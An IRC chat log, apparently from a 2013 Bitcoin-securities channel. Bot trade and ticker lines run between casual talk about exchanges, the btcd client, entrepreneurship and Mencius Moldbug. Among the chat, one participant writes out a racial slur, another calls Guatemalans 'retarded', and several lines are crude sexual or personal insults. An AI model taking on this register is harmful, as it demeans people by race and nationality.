[HAVELOCK] [ASICM] 195 @ 0.0145 = 2.8275 BTC [-] May 09 17:55:18 [BTCTC] [GSDPT] 26 @ 0.002976 = 0.0774 BTC [-] May 09 17:55:46 [BTCTC] [TAT.ASICMINER] 10 @ 0.0145 = 0.145 BTC [-] May 09 17:56:00 [BTCTC] [ASICMINER-PT] 1 @ 1.45001 BTC [-] May 09 17:56:04 [BTCTC] [ASICMINER-PT] 2 @ 1.45 = 2.9 BTC [-] May 09 17:56:35 [BTCTC] [ASICMINER-PT] 1 @ 1.48 BTC [+] May 09 17:57:04 [HAVELOCK] [ASICM] 15 @ 0.0155 = 0.2325 BTC [+] May 09 17:58:03 [HAVELOCK] [ASICM] 310 @ 0.0155 = 4.805 BTC [+] May 09 17:58:11 [BTCTC] [TAT.ASICMINER] 12 @ 0.0147 = 0.1764 BTC [+] May 09 18:07:04 [HAVELOCK] [ASICM] 100 @ 0.0155 = 1.55 BTC [+] May 09 18:07:15 [BTCTC] [TAT.ASICMINER] 80 @ 0.0145 = 1.16 BTC [-] May 09 18:07:18 [BTCTC] [TAT.ASICMINER] 4 @ 0.0144 = 0.0576 BTC [-] May 09 18:07:22 [BTCTC] [TAT.ASICMINER] 10 @ 0.01425 = 0.1425 BTC [-] May 09 18:07:55 [BTCTC] [ASICMINER-PT] 1 @ 1.44 BTC [-] May 09 18:08:09 [BTCTC] [ASICMINER-PT] 1 @ 1.42331 BTC [-] May 09 18:08:15 [BTCTC] [ASICMINER-PT] 1 @ 1.4233 BTC [-] May 09 18:08:19 [BTCTC] [ASICMINER-PT] 7 @ 1.42321 = 9.9625 BTC [-] May 09 18:08:33 [BTCTC] [ASICMINER-PT] 1 @ 1.4232 BTC [-] May 09 18:08:40 [BTCTC] [ASICMINER-PT] 4 @ 1.4231 = 5.6924 BTC [-] May 09 18:08:43 [BTCTC] [ASICMINER-PT] 5 @ 1.4231 = 7.1155 BTC [-] May 09 18:08:47 [BTCTC] [ASICMINER-PT] 1 @ 1.4223 BTC [-] May 09 18:10:04 [HAVELOCK] [ASICM] 500 @ 0.0143 = 7.15 BTC [-] May 09 18:10:05 [HAVELOCK] [ASICM] 500 @ 0.01421002 = 7.105 BTC [-] May 09 18:10:06 [HAVELOCK] [ASICM] 1 @ 0.01421001 BTC [-] May 09 18:10:07 [HAVELOCK] [ASICM] 73 @ 0.01421 = 1.0373 BTC [-] May 09 18:10:08 [HAVELOCK] [ASICM] 210 @ 0.0142 = 2.982 BTC [-] May 09 18:10:09 [HAVELOCK] [ASICM] 1000 @ 0.0142 = 14.2 BTC [-] May 09 18:10:21 lol no volume May 09 18:10:24 onlything trading May 09 18:14:05 http://www.youtube.com/watch?v=Jj4nJ1YEAp4 May 09 18:27:08 [BTCTC] [S.MPOE-PT] 1 @ 0.000697 BTC [+] May 09 18:28:05 [HAVELOCK] [HIM] 1 @ 2.08 BTC [-] May 09 18:31:33 [MPEX] [S.MPOE] 4450 @ 0.00074138 = 3.2991 BTC [-] May 09 18:36:04 [HAVELOCK] [ASICM] 5 @ 0.01475 = 0.0738 BTC [+] May 09 18:38:04 [BTCTC] [ASICMINER-PT] 1 @ 1.45 BTC [+] May 09 18:38:05 [HAVELOCK] [ASICM] 10 @ 0.01479 = 0.1479 BTC [+] May 09 18:39:04 [HAVELOCK] [ASICM] 100 @ 0.0145 = 1.45 BTC [-] May 09 18:39:05 [HAVELOCK] [ASICM] 15 @ 0.01475 = 0.2213 BTC [+] May 09 18:41:01 omg that depth chart is scam, kbtc and kusd scales are independent May 09 18:41:07 i thought it was fishy. May 09 18:41:12 where? May 09 18:41:17 http://blockchained.com/depth_mtgox_15d.png May 09 18:41:31 kusd scale changed May 09 18:41:37 from yest May 09 18:42:04 haha May 09 18:43:03 [HAVELOCK] [ASICM] 10 @ 0.0145 = 0.145 BTC [-] May 09 18:44:23 what does the output from assbot mean ? May 09 18:44:56 poop May 09 18:45:03 [exchange] [stocl] [qty] @ [price] = [total] [change] May 09 18:45:10 oh yeah that May 09 18:45:32 [BTCTC] [ASICMINER-PT] 1 @ 1.454 BTC [+] May 09 18:45:36 [BTCTC] [ASICMINER-PT] 6 @ 1.45 = 8.7 BTC [-] May 09 18:46:03 [HAVELOCK] [ASICM] 15 @ 0.01485 = 0.2228 BTC [+] May 09 18:46:05 [HAVELOCK] [ASICM] 5 @ 0.0149 = 0.0745 BTC [+] May 09 18:46:51 kako that is what i told you May 09 18:46:59 the scale is randomly set and means nothing May 09 18:47:13 like 8 hours ago... May 09 18:47:23 kakobrekla: yeah I noticed that when I refreshed May 09 18:47:23 no it means you need to take it into consideration May 09 18:47:29 last night May 09 18:47:45 Chaang-Noi hm i missed that somehow May 09 18:47:51 you said "it crossed" but i said that does not mean anything May 09 18:48:02 [MPEX] [O.USD.C101T] 1000 @ 0.15185377 = 151.8538 BTC [-] May 09 18:48:04 [MPEX] [O.USD.C098T] 1000 @ 0.15979648 = 159.7965 BTC [-] May 09 18:48:05 [HAVELOCK] [SDICE] 2 @ 0.3001 = 0.6002 BTC [-] May 09 18:48:06 [HAVELOCK] [SDICE] 1 @ 0.3 BTC [-] May 09 18:48:07 [HAVELOCK] [SDICE] 10 @ 0.29 = 2.9 BTC [-] May 09 18:48:08 it was right after you said it crossed, but you did not respond to me May 09 18:48:17 dunno May 09 18:48:29 but its not a scam May 09 18:49:10 the scale is just set to best fit that data for that time, so when it crosses means nothing May 09 18:49:30 cuz we can make it cross when ever May 09 18:50:07 [HAVELOCK] [ASICM] 20 @ 0.0149 = 0.298 BTC [+] May 09 18:50:30 its as scam as i am a cunt. May 09 18:50:40 lol okay May 09 18:51:05 [HAVELOCK] [ASICM] 10 @ 0.0149 = 0.149 BTC [+] May 09 18:51:06 [HAVELOCK] [ASICM] 500 @ 0.01485 = 7.425 BTC [-] May 09 18:51:52 so did you shop the cane to tortilla guy or what May 09 18:52:08 i paid him the 700 May 09 18:52:21 i mean the pimp cane May 09 18:52:28 to go along with the hat May 09 18:52:30 kako https://bitcointalk.org/index.php?topic=197842.0 but was not me May 09 18:52:55 aw May 09 18:53:05 whats with the face May 09 18:53:15 yeah i know reptile guy but meh May 09 18:53:29 is that guy still supernoding ? May 09 18:53:37 i think he is doing it now May 09 18:53:52 mpoe-pr is on vacation and the new girls are fucking clueless May 09 18:54:12 this one is nice too May 09 18:54:12 http://s20.postimg.org/r7ep43qrh/superfly.jpg May 09 18:54:28 so i have no idea like what's what on the trollboard. May 09 18:54:42 ahaha kickass May 09 18:54:55 i just found out today im in scammers parts of the forum lol May 09 18:55:07 you're wut ? May 09 18:55:12 scammers part of the forum? May 09 18:55:31 https://bitcointalk.org/index.php?topic=192905.0 May 09 18:55:55 just hit page 2 so aparently its done. May 09 18:56:04 [HAVELOCK] [VTX] 1 @ 0.4035 BTC [-] May 09 18:56:05 oh lol May 09 18:56:06 i mean dead May 09 18:56:39 i was called a scammer once, my scam was i called nefario a scammer, the the guy who called me a scammer got scammed by nefario and appoligized... id not worry kako May 09 18:56:57 i do not May 09 18:57:07 its resolved before it got to my attention May 09 18:58:21 [BTCTC] [TAT.ASICMINER] 7 @ 0.01469 = 0.1028 BTC [+] May 09 18:59:03 [HAVELOCK] [ASICM] 1 @ 0.01511999 BTC [+] May 09 18:59:05 [HAVELOCK] [ASICM] 25 @ 0.01512 = 0.378 BTC [+] May 09 19:00:39 did bfl eventually deliver to anyone btw ? May 09 19:00:53 seeing how iirc kakobrekla was called a scammer for the bitbet april bet May 09 19:01:29 from today http://arstechnica.com/gadgets/2013/05/weve-got-a-butterfly-labs-bitcoin-miner-and-its-pretty-darn-fast/ May 09 19:01:56 mircea_popescu http://arstechnica.com/gadgets/2013/05/weve-got-a-butterfly-labs-bitcoin-miner-and-its-pretty-darn-fast/ May 09 19:01:57 eh May 09 19:02:02 http://bfl.ptz.ro/ May 09 19:02:03 this May 09 19:02:12 no but i mean tio people. May 09 19:02:15 not to press contacts/shills May 09 19:02:18 see second link May 09 19:02:48 mp yes some people have them May 09 19:02:56 1 according to the list :D May 09 19:03:06 scared got one May 09 19:03:08 james got one May 09 19:03:12 some other press people did May 09 19:03:24 all i see there is no May 09 19:03:44 i see one yes May 09 19:04:19 i know personally two people not on that list who have one unit May 09 19:04:34 ;:bc,stats May 09 19:04:39 981 2013/03/07 20265 Yes 0 0 2 0 bitcoinerS May 09 19:04:41 da fuck ? May 09 19:05:02 o nm May 09 19:07:04 :) May 09 19:08:38 kakobrekla: another bitstamp lameness: http://imgur.com/a/yg9UH May 09 19:10:05 hm which part? May 09 19:11:07 part 9953 May 09 19:11:47 [BTCTC] [COGNITIVE] 1 @ 0.24795 BTC [+] May 09 19:11:48 ;;google part 9953 May 09 19:11:49 SSL2129AT/1J NXP Semiconductors | 568-9953-2-ND | DigiKey: ; 11-9953 Boyer v. Louisiana (04/29/2013) - Supreme Court of the ...: ; Amazon.com: Weber 9953 Premium Gas Grill Cover Fits Summit ...: [BTCTC] [ASICMINER-PT] 1 @ 1.469 BTC [+] May 09 19:14:15 [MPEX] [S.MPOE] 1821 @ 0.00072848 = 1.3266 BTC [-] May 09 19:14:16 [MPEX] [S.MPOE] 4170 @ 0.00072823 = 3.0367 BTC [-] May 09 19:14:18 [MPEX] [S.MPOE] 6100 @ 0.00072822 = 4.4421 BTC [-] May 09 19:14:19 [MPEX] [S.MPOE] 5109 @ 0.00072593 = 3.7088 BTC [-] May 09 19:14:40 [BTCTC] [ASICMINER-PT] 1 @ 1.46999 BTC [+] May 09 19:16:08 [BTCTC] [ASICMINER-PT] 16 @ 1.47 = 23.52 BTC [+] May 09 19:16:46 https://bitcointalk.org/index.php?topic=200213.0;topicseen May 09 19:18:04 [HAVELOCK] [ASICM] 25 @ 0.01512 = 0.378 BTC [+] May 09 19:23:27 [BTCTC] [ASICMINER-PT] 4 @ 1.469 = 5.876 BTC [-] May 09 19:27:04 [HAVELOCK] [ASICM] 14 @ 0.01512 = 0.2117 BTC [+] May 09 19:38:05 [HAVELOCK] [ASICM] 1 @ 0.01512 BTC [+] May 09 19:39:42 http://www.politico.com/story/2013/05/elizabeth-warren-student-loans-91079.html#ixzz2SkL3bhPH May 09 19:39:46 lol this shows promise May 09 19:39:59 "since you have free money, give everyone some" May 09 19:44:50 hey! whatchall think about btcd? May 09 19:45:48 i wonder if the got spec May 09 19:45:51 they May 09 19:46:08 whaddaya mean by got spec? May 09 19:46:31 [BTCTC] [BTC-BOND] 14 @ 0.00999 = 0.1399 BTC [+] May 09 19:46:33 benkay tell us about it ? May 09 19:46:35 [BTCTC] [BTC-BOND] 1000 @ 0.00997 = 9.97 BTC [-] May 09 19:46:43 bitcoin port in go May 09 19:46:53 hilarious pull quotes: May 09 19:47:27 [BTCTC] [ASICMINER-PT] 1 @ 1.424001 BTC [-] May 09 19:47:29 "in the process found issues with unit tests, non portable functions..." May 09 19:47:37 https://blog.conformal.com/btcd-a-bitcoind-alternative-written-in-go/ May 09 19:47:40 written by professionals May 09 19:47:53 who don't laugh like apes when someone says "unit test" May 09 19:48:36 "all code can and shall have test coverage" May 09 19:48:38 squee May 09 19:48:42 all of the squee, you guys May 09 19:48:50 and this was done because someone cared May 09 19:52:08 [BTCTC] [BITVPS] 1 @ 0.00093 BTC [-] May 09 19:52:17 wtf does xchat not support multiple connections? May 09 19:52:21 [BTCTC] [BITVPS] 1000 @ 0.00092 = 0.92 BTC [-] May 09 19:52:31 [BTCTC] [BITVPS] 1 @ 0.0009 BTC [-] May 09 19:52:39 [BTCTC] [BITVPS] 300 @ 0.00085 = 0.255 BTC [-] May 09 19:54:29 [BTCTC] [TAT.ASICMINER] 7 @ 0.014679 = 0.1028 BTC [-] May 09 19:55:56 derp derp derp May 09 19:57:12 anyways May 09 19:57:21 they're publishing this, notionally data extracted from their client May 09 19:57:22 http://blocksafari.com/ May 09 19:59:29 [BTCTC] [ASICMINER-PT] 4 @ 1.468 = 5.872 BTC [+] May 09 19:59:49 btcd May 09 19:59:50 18:57.32 ( kakobrekl ) do you have any spec written? im asking because bitcoind does not May 09 19:59:51 18:57.49 ( @marco ) that is a tough question May 09 19:59:51 18:57.57 ( @jy-p ) if you check out the godoc and comments, btcwire encodes a lot of the spec-related info May 09 19:59:51 18:57.58 ( @marco ) bitcoind is the spec essentially May 09 19:59:51 18:58.08 ( @marco ) we have documented heavily along the way May 09 19:59:51 18:58.18 ( kakobrekl ) so thats a no then? May 09 20:00:01 18:58.28 ( @marco ) it is looking like we will help getting the spec in order once development slows down a little May 09 20:00:02 18:58.36 ( @marco ) it's a half no May 09 20:00:02 18:58.55 ( @jy-p ) we obviously don't have a draft RFC :) May 09 20:00:02 18:59.10 ( @dhill ) if you run godoc, that will give you a lot of information May 09 20:00:38 cool! May 09 20:00:43 what are your thoughts on their response? May 09 20:01:17 my thoughs are : i hope they beat bitcoind guys to it May 09 20:01:30 [BTCTC] [GSDPT] 18 @ 0.003165 = 0.057 BTC [+] May 09 20:01:34 [BTCTC] [ASICMINER-PT] 1 @ 1.468 BTC [+] May 09 20:01:41 to a spec? May 09 20:01:44 yes May 09 20:01:55 [BTCTC] [ASICMINER-PT] 1 @ 1.468 BTC [+] May 09 20:02:09 they seem to be capable May 09 20:02:12 is bitcoind team actively working on a spec? May 09 20:02:34 [BTCTC] [ASICMINER-PT] 1 @ 1.46 BTC [-] May 09 20:02:43 [BTCTC] [ASICMINER-PT] 1 @ 1.45 BTC [-] May 09 20:03:05 [BTCTC] [ASICMINER-PT] 1 @ 1.44 BTC [-] May 09 20:04:08 19:03.19 ( @marco ) kakobrekl: http://godoc.org/github.com/conformal/btcwire May 09 20:05:35 [BTCTC] [ASICMINER-PT] 1 @ 1.431 BTC [-] May 09 20:05:46 [BTCTC] [ASICMINER-PT] 1 @ 1.430501 BTC [-] May 09 20:08:09 [HAVELOCK] [ASICM] 50 @ 0.0149 = 0.745 BTC [-] May 09 20:11:22 truff1es only your body can tell you that May 09 20:12:20 now havelock has it's own ASICM passthru? May 09 20:12:26 Asicminer is officially for hipsters. May 09 20:12:38 mircea_popescu: any new articles? May 09 20:12:46 rich hipsters May 09 20:12:48 bitcoin: officially for hipsters May 09 20:12:51 which are rare May 09 20:13:12 the ASICM on Havelock is an extension of the fractional AM assets I have on Bitfunder and BTCT May 09 20:18:01 http://trilema.com/2013/the-dilemma-of-fake-money/ May 09 20:18:04 just finished it. May 09 20:18:47 as I said to a lady last night: "banks offer returns. students don't. end of story" May 09 20:19:28 reading trilema when I should be studying: Priceless May 09 20:19:47 BTW mircea_popescu senator elizabeth warren is HOTT May 09 20:19:48 jkjk May 09 20:20:10 trilema's probably a better education than whatever you're studying, thestringpuller May 09 20:20:14 benkay read that article srsly :D May 09 20:20:16 not to kiss ass or anything May 09 20:20:21 i ams, mp, I ams. May 09 20:20:24 a May 09 20:20:28 so that explains the coincidence lol May 09 20:21:06 really? they're rarely in excess of 2k words May 09 20:21:39 I hope that Mencius Moldbug engages with you on this one, MP May 09 20:22:05 benkay he's already got one he carefully avoids lol May 09 20:22:08 Trilema is a differenet subject than I'm studying. May 09 20:22:32 I'd love to see mircea_popescu write an article on operating systems, or HLSL May 09 20:22:35 as in topic of bitcoin? May 09 20:22:41 homie May 09 20:22:47 get a job as a jr sysadmin May 09 20:22:54 or devops monkey as they're called May 09 20:22:58 Been there, done that. May 09 20:23:04 wait wat May 09 20:23:08 and you're back in school? May 09 20:23:13 I'm forever in school. May 09 20:23:14 ya what ? May 09 20:23:16 It's my limbo. May 09 20:23:23 wat wat wat May 09 20:23:23 I'm in limbo yo! May 09 20:23:28 did you fail out of the job market? May 09 20:23:43 No, like mircea_popescu, I am "a difficult student". May 09 20:23:47 I ask too many questions. May 09 20:23:55 Question too much authority. May 09 20:24:09 it's a shame you didn't find a shop where that kind of spirit is encouraged May 09 20:24:18 yeah May 09 20:24:40 interesting - only 43k volume in last 24h... VERY light trading... May 09 20:25:06 ready for a rollover? May 09 20:25:16 << doesn't know what he's saying May 09 20:25:57 yes, I think so May 09 20:26:56 benkay: I did find a shop where that is encouraged. Too bad capitalist countries don't condone true entrepreneurship May 09 20:27:37 I think mircea_popescu is one of the flagship authors on the subject of "pop-culture entrepreneurship in the land of capitalism" May 09 20:27:52 what is 'true entrepreneurship'? May 09 20:27:59 and how were you fucked for practicing it? May 09 20:28:51 the key to true entrepreneurship means solving a legitimate problem May 09 20:29:24 pop culture entrepreneurship involves creating a problem that really doesn't exist and marketing a solution to it, to grab the next round of funding from the daddy figure you never had growing up May 09 20:29:29 yes... not an "invented" problem... May 09 20:29:39 ThickAsThieves, I would use some other word than "fractional".. it may have unwanted associations :D May 09 20:29:56 sure! May 09 20:30:11 but that works all the time in america May 09 20:30:14 see: New Relic May 09 20:30:15 but it would be rather clever, selling same asicminer shares on multiple places :D May 09 20:30:18 who was that guy who sold matches... May 09 20:30:20 Heroku May 09 20:30:23 Github May 09 20:30:41 Tesla May 09 20:31:08 all these all also fall into the bucket of "bullshit we do to make more bullshit for idiots" May 09 20:31:39 Github is technically useful, but I see where you are going. May 09 20:31:44 Tesla is still too young. May 09 20:32:07 "technically useful" bro has you ever done the distributed teams thing? May 09 20:32:17 Yup. Using SVN May 09 20:32:20 we begged for github May 09 20:32:22 github eliminates massive comms overhead May 09 20:32:45 tech stuff you're not interested. May 09 20:33:00 actually *biz* stuff, but w/e May 09 20:33:20 [BTCTC] [ASICMINER-PT] 1 @ 1.430501 BTC [-] May 09 20:33:28 so github is like puppet labs May 09 20:33:38 in how they provide value May 09 20:33:39 another huge value creator May 09 20:33:55 you could either build the automation yourself, or buy it from someone else. May 09 20:34:14 That's how Atlassian became so big in under a decade. May 09 20:34:54 I'm missing the last pieces in how you got fucked for practicing some sort of atypical entrepreneurship. May 09 20:36:14 if you ask infinity times does it matter? May 09 20:36:41 I'm not very political. May 09 20:36:49 pop culture entrepreneurship involves creating a problem that really doesn't exist and marketing a solution to it, to grab the next round of funding from the daddy figure you never had growing up << amazinglty apt summary May 09 20:37:12 liberal, democrat, libertarian are all moronic simplifications May 09 20:37:29 no human with opinions worth paying attention to is a strict any one of those May 09 20:37:38 except maybe MM with his "reactionary" thing May 09 20:38:14 My political discourse usually involves: allowing people to have a choice, vs. not allowing them to make a choice. May 09 20:38:28 which is oversimplified May 09 20:38:37 mencius modbug. if you can't handle MP, you really can't handle MM. May 09 20:38:50 derp of derp course it's derp over derplified May 09 20:39:04 the only way to understand someone's politics is to fucking talk to them about things that are not politics May 09 20:39:14 well, things that are related to the real world May 09 20:39:18 satoshi - the father figure we've all been waiting for May 09 20:39:44 [BTCTC] [TAT.ASICMINER] 10 @ 0.01413 = 0.1413 BTC [-] May 09 20:39:45 /o\ May 09 20:40:02 [BTCTC] [TAT.ASICMINER] 1 @ 0.01413 BTC [-] May 09 20:40:11 [BTCTC] [TAT.ASICMINER] 5 @ 0.01412 = 0.0706 BTC [-] May 09 20:40:14 benkay moldbug never says nigger tho May 09 20:40:22 [BTCTC] [TAT.ASICMINER] 1 @ 0.0141 BTC [-] May 09 20:40:39 it's weird to hear a non american use that word May 09 20:40:43 ^django unchained fault May 09 20:41:07 a bet May 09 20:41:09 a hunch May 09 20:41:16 originating in the murkey intuitive parts of my brain May 09 20:41:21 murky* May 09 20:42:27 https://www.youtube.com/watch?v=_7sODzCqvvs lol May 09 20:42:49 thestringpuller I am genuinely interested in the series of events that pushed you back into the ivory tower May 09 20:43:14 ivory tower? May 09 20:43:27 mircea_popescu: he has a different agenda. using that word would drive off the soft-minded he's trying to implant viral ideas into. May 09 20:43:28 I've always been here May 09 20:43:32 Since 06 May 09 20:43:39 I am a difficult student May 09 20:43:41 who is going to bitcoin conference? May 09 20:43:43 so they make it difficult to graduate May 09 20:43:46 i am! May 09 20:43:48 benkay exactly. May 09 20:43:59 me too May 09 20:44:02 im impressed you know this tho. how'd you figure it ? May 09 20:44:13 it's not obvious? May 09 20:44:18 it is obvious May 09 20:44:23 that word fries circuits in america. May 09 20:44:23 this is a prime reason to suspect nobody sees it. May 09 20:44:35 MM wants functional brain circuitry. May 09 20:44:48 he just wants to perform low-level hardware attacks on complete systems. May 09 20:45:00 you, I don't think, care terribly about keeping the systems you operate on intact. May 09 20:45:18 understanding (again, I think) that there's an infinite well of humans who might receive your ideas. May 09 20:45:42 guys, who is this moldbug? some mythical figure? May 09 20:45:43 this is an interesting aprpoach. May 09 20:45:53 jurov unqualified reservations @ blogspot May 09 20:47:00 but do you appreciate good ideas? May 09 20:47:07 independent of the writing? May 09 20:47:08 if it's not clear, what i was saying is obvious is the observation that "he's trying to implant viral ideas into" May 09 20:47:18 kinda why i don't like the guy's blog. May 09 20:47:25 yet another marketeering blog ? such a waste of time. May 09 20:47:29 har May 09 20:47:58 he's marketeering new paradigms to undermine the legitimacy of the USG. I can get behind that. May 09 20:48:06 meh. May 09 20:48:10 i like honest people. May 09 20:48:13 you push the 'life is all domination and submission at all scales' trip May 09 20:48:41 best investment advice ever: http://i.imgur.com/aRZvMZ6.jpg May 09 20:48:47 benkay only in those parts where "common agreement" diverges too much towards "lalala i can make it so" May 09 20:52:15 sorry, mp, I don't understand what you're getting at. May 09 20:53:28 i push the submission/dominance trip in those fields where people are totally off the deep end with the "i can do everything" and "agreement makes it real" nonsense May 09 20:56:20 mircea_popescu, where's the dishonesty in MM's work? May 09 20:56:42 take the cybernetic analogy. May 09 20:57:06 if you want to get the borgs to revolt, it's one way to tell the borgs here's what you are, here's how things work, get fucked May 09 20:57:12 it's nother to try and get a virus on May 09 20:57:38 now. pick the honest approach. May 09 20:58:41 [MPEX] [S.DICE] 1000 @ 0.00335 = 3.35 BTC [+] May 09 21:00:06 [HAVELOCK] [VTX] 1 @ 0.4101 BTC [+] May 09 21:00:07 [HAVELOCK] [VTX] 7 @ 0.41 = 2.87 BTC [-] May 09 21:00:08 [HAVELOCK] [VTX] 15 @ 0.40340001 = 6.051 BTC [-] May 09 21:00:19 [MPEX] [S.MPOE] 16000 @ 0.00072752 = 11.6403 BTC [+] May 09 21:02:43 "I promise - this is my last Bitcoin post. I fear it attracts low-quality traffic." May 09 21:07:07 now, MP, what if the borgs are so thoroughly programmed that their filters just escape anything that threatens the binary? May 09 21:07:16 (to get excessively nerdy with the metaphors) May 09 21:07:27 sure honesty is great May 09 21:07:32 but if you need to break through a firewall... May 09 21:08:39 benkay: moldbug doesn't work on the masses. and he never intended to. his "red pill" is for the intellectually-curious/adventurous, by his own admission. May 09 21:09:01 who are nonetheless *thoroughly* programmed. May 09 21:09:32 nowhere on this planet are the unprogrammed to be found en masse. May 09 21:10:20 hence his "red pill" analogy. you need to be someone whose programming is already hickupping to benefit from the pill. May 09 21:10:59 sure. i hold that "honesty" is incompatible with his goals, which are to further derail already degrading programming. May 09 21:11:16 he seems to go into lengthy elaborations only to end each article "usg will kill it anyway" May 09 21:11:36 I don't know that MP cares about convincing a small slice of the American technocracy that the USG is broken and/or dying. May 09 21:12:02 jurov, I think that's a meta-joke. "none of this matters anyways because the thing I'm trying to tell you ruins your life regularly will ruin your life about this as well." May 09 21:12:40 just 'cause you can't parse the idea doesn't mean anything, truff1es. May 09 21:12:49 benkay i don't care. May 09 21:12:56 see?! May 09 21:13:08 tbh, it probably could be said that unlike the moldbug fellow i have the advantage of not reallty giving a shiot avbout the us government May 09 21:13:15 folks starting to predict sub $90 dollar market price now May 09 21:13:18 but then again his caring is what'll perpetuate it, if even in the negative May 09 21:13:21 idk bout that htough May 09 21:13:40 much like the red marking on the girl's ass perpetuates the switch vibration long after the switch has rested. May 09 21:13:58 wat May 09 21:14:09 the mark does nothing May 09 21:14:11 it's an indicator. May 09 21:14:19 that a thing happened. May 09 21:14:23 can invest in Tesla yet with my bitcoins directly May 09 21:14:27 ya. the thing is there, in the negative. May 09 21:14:28 or do i have to keep waiting May 09 21:14:32 the apple carries your bite sort of thing May 09 21:14:44 tesla should just a bitcoin client in the car May 09 21:14:52 accidentally a word May 09 21:15:17 nowhere on this planet are the unprogrammed to be found en masse. << unprogramming is actually trivially simple to do. takes about two weeks. May 09 21:15:18 I am not following at all, mp. May 09 21:15:18 put May 09 21:15:35 benkay so ask a question. May 09 21:15:46 trying to work one up May 09 21:16:04 [HAVELOCK] [ASICM] 6 @ 0.0147 = 0.0882 BTC [-] May 09 21:16:07 jcpham, why? for better nerdgasm? May 09 21:16:18 nerdgasm all over the batteries May 09 21:16:21 for sure May 09 21:16:53 sorry i'm not paying attention to your conversation May 09 21:16:57 looks like a lot of words May 09 21:17:16 jcpham you;'re such a week troll you know :D May 09 21:17:21 good May 09 21:17:24 unicorns May 09 21:17:45 it's weak fuckhead May 09 21:17:48 not week like 7 days May 09 21:17:53 okay jcpham, go back polishing your tesla.. oh moment, before that tell me, did elon apologize to ny times? May 09 21:17:56 i have a bet May 09 21:18:03 where's tiberiusv May 09 21:18:05 he did didn't he ? May 09 21:18:08 bring him out May 09 21:18:19 [BTCTC] [ASICMINER-PT] 1 @ 1.44 BTC [+] May 09 21:18:22 [BTCTC] [ASICMINER-PT] 1 @ 1.438511 BTC [-] May 09 21:18:28 ;;ticker May 09 21:18:30 BTCUSD ticker | Best bid: 112.05000, Best ask: 112.67230, Bid-ask spread: 0.62230, Last trade: 112.05000, 24 hour volume: 33089.17796065, 24 hour low: 108.80000, 24 hour high: 115.21589, 24 hour vwap: 112.07752 May 09 21:18:33 [BTCTC] [ASICMINER-PT] 1 @ 1.430511 BTC [-] May 09 21:18:48 [BTCTC] [ASICMINER-PT] 2 @ 1.4305 = 2.861 BTC [-] May 09 21:19:01 mircea_popescu channel is sausage party May 09 21:19:01 i doubt assbot wants to admint tiberiusiv for third time May 09 21:19:15 after two bans May 09 21:19:20 he got banned ?! May 09 21:19:24 someone got baned from here May 09 21:19:30 wow May 09 21:19:49 yes, he got May 09 21:20:17 did he call kakobrekla a cnut May 09 21:21:00 ;;seen tiberiusiv May 09 21:21:00 tiberiusiv was last seen in #bitcoin-assets 2 days, 18 hours, 51 minutes, and 12 seconds ago: you cant read english paragraphs May 09 21:21:13 he gets upset when poor people speak May 09 21:21:37 he got klined or banned May 09 21:22:05 the former is not much of an acxcomplishment May 09 21:22:06 truff1es that includes you May 09 21:22:13 zing! May 09 21:22:40 nah trufs don't need adoration, just attention May 09 21:22:44 i luke truffles (no homo) May 09 21:22:48 not getting enough at home i warrant May 09 21:22:49 *like May 09 21:24:39 lol is the no homo because of luke or truffles ? May 09 21:27:06 [HAVELOCK] [ASICM] 5 @ 0.0147 = 0.0735 BTC [-] May 09 21:27:36 no comment May 09 21:29:01 [BTCTC] [ASICMINER-PT] 1 @ 1.464899 BTC [+] May 09 21:29:05 [BTCTC] [ASICMINER-PT] 1 @ 1.4649 BTC [+] May 09 21:29:37 [BTCTC] [ASICMINER-PT] 1 @ 1.465 BTC [+] May 09 21:32:54 [BTCTC] [TAT.ASICMINER] 10 @ 0.014675 = 0.1468 BTC [+] May 09 21:33:14 [BTCTC] [TAT.ASICMINER] 3 @ 0.014678 = 0.044 BTC [+] May 09 21:33:30 [BTCTC] [TAT.ASICMINER] 27 @ 0.014679 = 0.3963 BTC [+] May 09 21:33:42 [MPEX] [O.USD.C101T] 1000 @ 0.15511341 = 155.1134 BTC [+] May 09 21:33:44 [MPEX] [O.USD.C098T] 1000 @ 0.16330751 = 163.3075 BTC [+] May 09 21:39:05 [HAVELOCK] [ASICM] 35 @ 0.0147 = 0.5145 BTC [-] May 09 21:40:06 [HAVELOCK] [ASICM] 4 @ 0.0147 = 0.0588 BTC [-] May 09 21:40:26 [BTCTC] [TAT.ASICMINER] 13 @ 0.014679 = 0.1908 BTC [+] May 09 21:43:23 [MPEX] [S.MPOE] 4750 @ 0.00072752 = 3.4557 BTC [+] May 09 21:46:48 mircea_popescu: more articles please May 09 21:46:55 nothing left to read on trilemma :P May 09 21:47:21 lol May 09 21:49:00 i see how it is May 09 21:50:27 i have your subscription nao so lalala May 09 21:51:05 BUT I WANT MOAR May 09 21:51:11 I NEED MOAR TRILEMA!!!! May 09 21:51:26 hit the title, it reads a random article May 09 21:51:30 prolly in romanian. May 09 21:51:46 so how do I know you aren't a vampire? May 09 21:51:50 or related to dracula? May 09 21:53:02 well... i don't like girls on the rag... May 09 21:53:25 haha May 09 21:55:03 mircea_popescu: what was so loathsome about Guatemala? May 09 21:55:54 i'm not even sure where to begin. May 09 21:56:00 just, retarded peeps. May 09 21:56:59 [BTCTC] [TAT.ASICMINER] 5 @ 0.014679 = 0.0734 BTC [+] May 09 21:57:36 fair enough May 09 21:58:36 mircea_popescu: what do you think of the match king? May 09 21:58:44 dunno what that is May 09 21:58:54 Ivar Kreuger May 09 21:58:57 but i'd rather have a match than a lighter May 09 21:59:04 this was before lighters May 09 21:59:09 haha May 09 21:59:23 matches rule May 09 21:59:24 FIRE May 09 22:00:24 anyway. murky 1900s stuff. May 09 22:00:30 [MPEX] [S.MPOE] 4321 @ 0.00072607 = 3.1373 BTC [-] May 09 22:00:31 [MPEX] [S.MPOE] 9845 @ 0.00072593 = 7.1468 BTC [-] May 09 22:03:09 ;;ticker May 09 22:03:10 BTCUSD ticker | Best bid: 112.98000, Best ask: 113.34397, Bid-ask spread: 0.36397, Last trade: 113.34398, 24 hour volume: 32826.20339078, 24 hour low: 108.80000, 24 hour high: 115.21589, 24 hour vwap: 112.01367 May 09 22:05:32 [BTCTC] [RSM] 2 @ 0.009 = 0.018 BTC [+] May 09 22:07:25 [MPEX] [S.MPOE] 4321 @ 0.00072622 = 3.138 BTC [+] May 09 22:07:27 [MPEX] [S.MPOE] 8196 @ 0.00072593 = 5.9497 BTC [-] May 09 22:07:31 [MPEX] [S.MPOE] 5250 @ 0.00071973 = 3.7786 BTC [-] May 09 22:07:37 [MPEX] [S.MPOE] 998 @ 0.0007181 = 0.7167 BTC [-] 